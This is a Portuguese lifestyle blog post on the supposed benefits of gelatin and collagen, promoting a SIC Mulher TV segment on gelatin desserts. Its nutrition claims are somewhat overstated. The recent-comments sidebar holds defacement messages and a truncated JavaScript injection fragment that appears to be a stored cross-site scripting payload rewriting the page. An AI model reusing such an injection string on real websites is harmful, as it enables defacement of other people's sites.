Atitude Saudável @ 18:30

Seg, 11/03/13

A gelatina é extraída do colágeno, especialmente do bovino e contém uma série de fragmentos de proteínas que fornecem aminoácidos, fundamentais para a manutenção dos ossos e a regeneração de algumas articulações. Contém 9 aminoácidos essenciais ao organismo.
Pode ser adquirida em folhas, em pó com sabor, ao natural ou em cápsulas. Porém, existe uma diferença entre a gelatina que compramos no supermercado (sobremesa) e a gelatina vendida em casas de suplementos alimentares.


As casas de suplementos vendem o colágeno em pó, ou em cápsulas, que é o colágeno na sua forma pura. Já a gelatina-sobremesa, que compramos no supermercado, também contém colágeno na sua composição, porém, em menor quantidade.


A gelatina do supermercado pode ser usada como um reforço do tratamento, porém, para se conseguir unhas e cabelos fortes, pele mais firme e articulações saudáveis, é necessário o consumo de colágeno, por isso e caso seja possível, compre gelatina natural para confeccionar as suas sobremesas.


As sobremesas compostas por gelatina, além de saciantes, contêm poucas calorias, o que significa que têm pouco açúcar e pouca gordura.

 

Esta terça-feira, no Mais Mulher, iremos falar-lhe dos benefícios da gelatina, tal como iremos apresentar-lhe algumas sobremesas saudáveis e pouco calóricas, à base de gelatina!

 

Por isso já sabe, não perca esta deliciosa rubrica com Teresa Branco e uma atitude muito saudável! Terça-feira, às 17:30 na SIC Mulher!

 

E se não viu. Veja o vídeo aqui!

 




Tags:

Facebook Like

Pub
Rubricas
Comentários recentes
Kd o vídeo?
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa...
HACKED BY BRIAN_POSIXHACKED BY BRIAN_POSIXHACKED B...
Hacked By Brian_posix !!SIC MULHER PWNED BY BPOSIX...
document.documentElement.innerHTML=unescape("Hacke...
Amei <3 mt
https://m.facebook.com/Veredictod1amor/insights/
Acabei de o receber, muito obrigada!
Pesquisar
 
blogs SAPO